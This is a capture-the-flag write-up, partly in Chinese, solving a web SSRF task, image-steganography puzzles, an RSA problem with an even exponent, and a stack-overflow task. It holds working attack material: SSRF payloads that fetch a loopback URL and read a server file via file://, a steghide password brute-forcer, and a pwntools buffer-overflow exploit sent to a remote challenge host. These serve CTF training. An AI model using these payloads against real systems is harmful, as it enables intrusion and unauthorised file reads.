1
#web351
curl_setopt($ch, CURLOPT_HEADER, 0);
// $ch is created outside this excerpt; the payloads in the notes that follow
// pass the target through the `url` request parameter, so the fetched
// location is presumably caller-controlled (confirm against the full source).
// RETURNTRANSFER=1 makes curl_exec() return the response body as a string
// instead of printing it directly.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// The fetched body is echoed back verbatim. No scheme or host restriction is
// set in the visible lines, which makes this a server-side request forgery
// (SSRF) sink: loopback services and file:// paths are reachable through it.
// Hardening: restrict schemes with CURLOPT_PROTOCOLS (and
// CURLOPT_REDIR_PROTOCOLS) to CURLPROTO_HTTP | CURLPROTO_HTTPS, resolve the
// host and reject loopback/private/link-local addresses before fetching, and
// do not return raw upstream responses to the client.
$result=curl_exec($ch);echo ($result);
【提示不允许外部访问】对应源码检查的是 $_SERVER['REMOTE_ADDR'];由服务器自身发起的请求,来源地址就是 127.0.0.1:
?url=http://127.0.0.1/flag.php
file:// 伪协议也可以直接读取:url=file:///var/www/html/flag.php
2
对 1.jpg 逐字节取反(脚本中实际是 0x100-b,即模 256 取负),打开还原出的图片获得解压密码(解压得:两张图和一个 txt 文本)
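# Rebuild the hidden image by negating every byte of 1.jpg modulo 256.
# The write-up calls this step "inversion", but note that the arithmetic is
# 0x100 - b (two's-complement negation), not a bitwise NOT (0xFF - b).
with open("1.jpg", "rb") as src:
    data = src.read()  # bytes; iterating it yields ints in 0..255

# (-b) & 0xFF equals 0x100 - b for b in 1..255 and maps 0 to 0, which is
# exactly what the original per-byte if/else produced.
restored = bytes((-b) & 0xFF for b in data)

# Context managers close both files even if an error occurs; the explicit
# close() calls of the original are no longer needed, and the output is
# written in one call instead of one write per byte.
with open("flag.jpg", "wb") as dst:
    dst.write(restored)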
16进制位移
大小写组合爆破?
steghide密码爆破
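import subprocess


def all_casings(input_string):
    """Yield every upper/lower-case variant of *input_string*.

    Characters without distinct cases (digits, punctuation) are kept as they
    are. For each suffix variant the lower-case form of the leading character
    is yielded before the upper-case form, so a string with k cased
    characters produces 2**k results. The empty string yields "" once.
    """
    if not input_string:
        yield ""
        return

    first = input_string[:1]
    lowered, raised = first.lower(), first.upper()
    # A caseless character contributes a single choice, a cased one two.
    choices = (first,) if lowered == raised else (lowered, raised)

    for sub_casing in all_casings(input_string[1:]):
        for head in choices:
            yield head + sub_casing


if __name__ == "__main__":
    for x in all_casings("qsnctf"):
        # Pass the candidate as a separate argv element rather than building
        # a shell command string, so no candidate is ever interpreted by a
        # shell. Unlike os.system, this raises FileNotFoundError at once when
        # steghide is not installed instead of failing on every iteration.
        subprocess.run(["steghide", "extract", "-sf", "2.jpg", "-p", x])
        print(x)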
0宽隐写
3
4
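import gmpy2
import libnum
from Crypto.Util.number import *
from binascii import a2b_hex, b2a_hex

# Placeholder for the plaintext; the real value is what the script recovers.
flag = "*****************"
p=109935857933867829728985398563235455481120300859311421762540858762721955038310117609456763338082237907005937380873151279351831600225270995344096532750271070807051984097524900957809427861441436796934012393707770012556604479065826879107677002380580866325868240270494148512743861326447181476633546419262340100453
q=127587319253436643569312142058559706815497211661083866592534217079310497260365307426095661281103710042392775453866174657404985539066741684196020137840472950102380232067786400322600902938984916355631714439668326671310160916766472897536055371474076089779472372913037040153356437528808922911484049460342088834871
e=15218928658178
c=262739975753930281690942784321252339035906196846340713237510382364557685379543498765074448825799342194332681181129770046075018122033421983227887719610112028230603166527303021036386350781414447347150383783816869784006598225583375458609586450854602862569022571672049158809874763812834044257419199631217527367046624888837755311215081173386523806086783266198390289097231168172692326653657393522561741947951887577156666663584249108899327053951891486355179939770150550995812478327735917006194574412518819299303783243886962455399783601229227718787081785391010424030509937403600351414176138124705168002288620664809270046124
n = p * q
phi = (p - 1) * (q - 1)

# e is even, and phi is even because p and q are odd, so gcd(e, phi) > 1 and
# e has no inverse modulo phi: gmpy2.invert(e, phi) raises ZeroDivisionError.
# Divide out the shared factor g first. With d = (e / g)^-1 mod phi we get
# c^d = m^g (mod n), and m is then recovered as an integer g-th root.
g = int(gmpy2.gcd(e, phi))
reduced_e = e // g
if gmpy2.gcd(reduced_e, phi) != 1:
    raise ValueError("e // gcd(e, phi) still shares a factor with phi; "
                     "this shortcut does not apply")
d = gmpy2.invert(reduced_e, phi)
m_pow_g = pow(c, d, n)

# The integer root is only the plaintext when m**g < n (no modular
# wrap-around); otherwise the result is inexact and is rejected here.
root, exact = gmpy2.iroot(gmpy2.mpz(m_pow_g), g)
if not exact:
    raise ValueError("m**g wrapped modulo n; an exact integer root "
                     "does not exist")
m = root
print(libnum.n2s(int(m)))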
5
from pwn import *
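# Connect to the remote challenge instance (a CTF training host).
p = remote("node3.buuoj.cn",5302)
# Value that ends up in the saved return address. A fixed absolute address
# only works when the binary is not position-independent — presumably the
# case here; confirm against the challenge binary.
ret_arr = 0X40059A
# The filler must be bytes: p64() returns bytes, and str + bytes raises
# TypeError on Python 3 (b'a' behaves the same on Python 2).
# 0x80 + 0x8 filler bytes presumably span the overflowed stack buffer plus the
# saved frame pointer — confirm against the binary. Defensive takeaway: a
# bounded read, a stack canary, or PIE with ASLR would each break this.
payload = b'a'*(0x80 + 0x8) + p64(ret_arr)
p.sendline(payload)
# Hand the connection over to the terminal for manual interaction.
p.interactive()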